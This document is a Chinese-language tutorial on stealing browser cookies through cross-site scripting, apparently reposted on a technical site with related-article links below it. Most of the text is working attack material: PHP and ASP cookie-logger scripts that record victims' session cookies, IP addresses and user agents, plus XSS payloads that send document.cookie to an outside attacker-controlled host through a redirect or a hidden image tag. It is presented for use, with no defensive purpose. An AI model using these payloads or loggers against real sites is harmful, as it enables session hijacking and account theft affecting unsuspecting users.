利用xss偷cookie教学

简介: 使用的工具: 1.免费网页支援PHP 2.存在xss的脆弱的网站。 vb.php为存放cookie的网页 PHP Code:Cookies Stealther - Designed and programmed by R00t[ATI]COOKIES STEALTHERBy R00T[ATI] documents.php取得cookie的网页PHP Code:Vb.php文件是用来收集Cookie和其他信息。

使用的工具
1.免费网页 支援PHP
2.存在xss的脆弱的网站

vb.php 为存放cookie 的网页
PHP Code:

<head>
<meta http-equiv="Content-Language" content="it">
<title>Cook ie s Stealther - Designed and programmed by R00t[ATI]</title>
</head>

<body bgcol or ="#C0C0C0">

<p align="center"><font color="#FF0000">COOKIES STEALTHER</font></p>
<p align="center"><font face="Arial" color="#FF0000">By R00T[ATI]</font></p>
<p align="left"> </p>

</body>



documents.php取得cookie的网页PHP Code:

<?php

$ip = $_SERVER['REMOTE_ADDR'];
$referer = $_SERVER['HTTP_REFERER'];
$agent = $_SERVER['HTTP_USER_AGENT'];

$data = $_GET[c];

$time = date("Y-m-d G:i:s A");
$text = "<br><br>".$time." = ".$ip."<br><br>User Agent: ".$agent."<br>Referer:   ".$referer."<br>Session: ".$data."<br><br><br>";

$file = fopen('vb.php' , 'a');
fwrite($file,$text);
fclose($file);
header("Location: http://www.google.com");

?>


Vb.php文件是用来收集Cookie和其他信息。
documents.php文件用于抓取资料如: IP地址,用户代理和cookie 。
现在,我们需要找到脆弱网站跨站脚本 ( XSS ) 。在这之后插入一个脚本调用documents.php是抓住文件的Cookie使用的方法 documents.php?c="+document.cookie;如下例子:
Code:

http://vulnerable-site.com/vulnerable_page.php?vulnerable_method=<script>document.location="http://syshack.sy.funpic.de/documents.php?c="+document.cookie;</script>



当受害者点到这个连结时cookie就被偷走了会存放在vb.php里面

相关代码:

<script>document.write('<img src="http://url/news. asp ?msg='+document.cookie+'" width=0 height=0 border=0 />');</script>



news.asp代码:

<%
msg=Request.ServerVariables("QUERY_STRING")    
testfile=Server.MapPath("cook.txt")    
set fs=server.CreateObject("scripting.filesystemobject")    
set thisfile=fs.OpenTextFile(testfile,8,True,0)    
thisfile.Writeline(""&msg& "")    
thisfile.close    
set fs = nothing    
%>



PHP版代码:

<?php
$cookie = $_GET['c'];
$ip = getenv ('REMOTE_ADDR');
$time=date("j F, Y, g:i a");
$referer=getenv ('HTTP_REFERER');
$fp = fopen('cook.txt', 'a');
fwrite($fp, 'Cookie: '.$cookie.'<br> IP: ' .$ip. '<br> Date and Time: ' .$time. '<br> Referer: '.$referer.'<br><br><br>');
fclose($fp);
?>
目录
相关文章
|
12月前
|
安全 JavaScript 前端开发
[网络安全]XSS之Cookie外带攻击姿势及例题详析
XSS 的 Cookie 外带攻击就是一种针对 Web 应用程序中的 XSS(跨站脚本攻击)漏洞进行的攻击,攻击者通过在 XSS 攻击中注入恶意脚本,从而窃取用户的 Cookie 信息。
528 0
|
JavaScript 安全 数据安全/隐私保护
dvwa下利用xss获取cookie并利用(绕过验证)
dvwa下利用xss获取cookie并利用(绕过验证)
560 0
|
存储 Web App开发 编解码
浏览器原理 32 # 跨站脚本攻击(XSS):为什么Cookie中有HttpOnly属性?
浏览器原理 32 # 跨站脚本攻击(XSS):为什么Cookie中有HttpOnly属性?
104 0
浏览器原理 32 # 跨站脚本攻击(XSS):为什么Cookie中有HttpOnly属性?
|
Shell Linux 网络安全
【靶机】xss盗取cookie-sqlmap进阶-通配符提权-docker逃逸-The Marketplace
靶机难度中等,对小白不太友好,建议边打边看,学习一下思路。
261 0
|
存储 JavaScript 前端开发
网络安全——XSS之被我们忽视的Cookie
Cookie在我们身边一直被大家所使用着,但却一直被忽视,那我们今天就一起来看看到底什么是Cookie,和我们的网络安全又有什么联系呢
4218 10
网络安全——XSS之被我们忽视的Cookie
|
Web App开发 监控 JavaScript
XSS攻击之窃取Cookie
译者按: 10 年前的博客似乎有点老了,但是XSS 攻击的威胁依然还在,我们不得不防。 原文: XSS - Stealing Cookies 101 译者: Fundebug 本文采用意译,版权归原作者所有 窃取Cookie是非常简单的,因此不要轻易相信客户端所声明的身份。
1268 0
|
JavaScript 安全 前端开发
如何绕过sop执行XSS盗取cookie并发送推文?
本文讲的是如何绕过sop执行XSS盗取cookie并发送推文?,先通过视频看看这个漏洞的威力吧,在第一个59秒的视频中,我们使用用户名为:Charles Darwin发送推文。在第二个两分钟的视频中,我们通过Edge默认密码管理器进行发送推文甚至查看用户密码。
1709 0